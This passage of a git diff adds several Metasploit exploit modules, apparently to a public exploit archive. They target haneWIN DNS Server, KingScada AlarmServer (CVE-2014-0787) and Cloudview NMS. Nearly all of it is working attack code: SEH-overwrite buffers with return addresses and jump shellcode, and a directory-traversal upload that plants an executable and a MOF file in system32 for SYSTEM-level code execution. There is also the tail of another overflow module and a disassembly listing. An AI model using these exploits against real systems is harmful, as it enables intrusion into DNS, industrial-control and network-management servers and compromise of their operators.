'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 19 2010')) + + register_options([Opt::RPORT(9120)], self.class) + end + + def exploit + connect + + sploit = "GetServerInfo" + sploit << "\x41" * 8 + sploit << payload.encoded + sploit << "\x42" * (303 - (8 + payload.encoded.length)) + sploit << generate_seh_record(target.ret) + sploit << make_nops(4) + sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311 + sploit << rand_text_alpha_upper(200) + + print_status("Trying target #{target.name}...") + + sock.put(sploit) + + handler + disconnect + end + +end +__END__ +0033C05C 55 PUSH EBP +0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C] +0033C061 3AC2 CMP AL,DL +0033C063 74 14 JE SHORT libpal.0033C079 +0033C065 3C 0D CMP AL,0D +0033C067 74 10 JE SHORT libpal.0033C079 +0033C069 3C 0A CMP AL,0A +0033C06B 74 0C JE SHORT libpal.0033C079 +0033C06D 41 INC ECX +0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL +0033C071 47 INC EDI +0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI] +0033C075 84C0 TEST AL,AL +0033C077 ^75 E8 JNZ SHORT libpal.0033C061 +0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0 +0033C07D 5D POP EBP +0033C07E 5F POP EDI +0033C07F 890B MOV DWORD PTR DS:[EBX],ECX +0033C081 5E POP ESI +0033C082 B8 01000000 MOV EAX,1 +0033C087 5B POP EBX +0033C088 C3 RETN diff --git a/platforms/windows/remote/42723.rb b/platforms/windows/remote/42723.rb new file mode 100755 index 000000000..0c1b5e09c --- /dev/null +++ b/platforms/windows/remote/42723.rb @@ -0,0 +1,74 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'haneWIN DNS Server Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in + haneWIN DNS Server <= 1.5.3. The vulnerability is triggered + by sending an overly long packet to the victim server. A memcpy + function blindly copies user supplied data to a fixed size buffer + leading to remote code execution. + + This module was tested against haneWIN DNS 1.5.3 + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '31260' ], + [ 'OSVDB', '102773' ] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1000, + 'DisableNops' => true, + 'BadChars' => "\x00\x0a\x0d\x20", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'DefaultTarget' => 0, + 'Targets' => + [ + [ + 'Windows 2000 SP4 EN / haneWIN DNS 1.5.3', + { + # msvcrt.dll v6.10.9844.0 + # pop esi/ pop edi/ retn + 'Ret' => 0x78010394, + } + ] + ], + 'DisclosureDate' => 'Jul 27 2013')) + + register_options([Opt::RPORT(53)], self.class) + end + + def exploit + connect + + p = make_nops(32) + payload.encoded + + buf = Rex::Text.pattern_create(5000) + buf[0, 2] = [0x4e20].pack('n') # length for malloc + buf[1332, p.length] = p + buf[2324, 8] = generate_seh_record(target.ret) + buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000 + + print_status("Sending malicious request...") + sock.put(buf) + disconnect + + end +end diff --git a/platforms/windows/remote/42724.rb b/platforms/windows/remote/42724.rb new file mode 100755 index 000000000..19b4b2221 --- /dev/null +++ b/platforms/windows/remote/42724.rb @@ -0,0 +1,78 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'KingScada AlarmServer Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow found in + KingScada < 3.1.2.13. The vulnerability is triggered when + sending a specially crafted packet to the 'AlarmServer' + (AEserver.exe) service listening on port 12401. During the + parsing of the packet the 3rd dword is used as a size value + for a memcpy operation which leads to an overflown stack buffer + }, + 'Author' => [ 'James Fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-0787' ], + [ 'ZDI', '14-071' ], + [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4', + { + # dbghelp.dll + # pop esi/ pop edi/ retn + 'ret' => 0x02881fbf, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 10, 2014')) + + register_options([Opt::RPORT(12401)], self.class) + end + + def exploit + connect + + p = payload.encoded + + buf = make_nops(5000) + buf[0, 4] = [0x000004d2].pack('V') + buf[4, 4] = [0x0000007b].pack('V') + buf[8, 4] = [0x0000133c].pack('V') # size for memcpy() + buf[1128, p.length] = p + buf[2128, 8] = generate_seh_record(target['ret']) + buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200 + + print_status("Trying target #{target.name}...") + + sock.put(buf) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42725.rb b/platforms/windows/remote/42725.rb new file mode 100755 index 000000000..58c96043f --- /dev/null +++ b/platforms/windows/remote/42725.rb @@ -0,0 +1,88 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Rex::Proto::TFTP + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + + def initialize(info={}) + super(update_info(info, + 'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Cloudview NMS server. The + software contains a directory traversal vulnerability that allows a remote + attacker to write arbitrary file to the file system, which results in + code execution under the context 'SYSTEM'. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'james fitts' ], + 'References' => + [ + ['URL', '0day'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ ' Cloudview NMS 2.00b on Windows', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 13 2014", + 'DefaultTarget' => 0)) + + register_options([ + OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]), + OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]), + OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ]) + ], self.class) + end + + def upload(filename, data) + tftp_client = Rex::Proto::TFTP::Client.new( + "LocalHost" => "0.0.0.0", + "LocalPort" => 1025 + rand(0xffff-1025), + "PeerHost" => datastore['RHOST'], + "PeerPort" => datastore['RPORT'], + "LocalFile" => "DATA:#{data}", + "RemoteFile" => filename, + "Mode" => "octet", + "Context" => {'Msf' => self.framework, "MsfExploit" => self }, + "Action" => :upload + ) + + ret = tftp_client.send_write_request { |msg| print_status(msg) } + while not tftp_client.complete + select(nil, nil, nil, 1) + tftp_client.stop + end + end + + def exploit + peer = "#{datastore['RHOST']}:#{datastore['RPORT']}" + + exe_name = rand_text_alpha(rand(10)+5) + '.exe' + exe = generate_payload_exe + mof_name = rand_text_alpha(rand(10)+5) + '.mof' + mof = generate_mof(mof_name, exe_name) + + depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH'] + levels = "../" * depth + + print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)") + upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe) + + select(nil, nil, nil, 1) + + print_status("#{peer} - Uploading .mof...") + upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) + end +end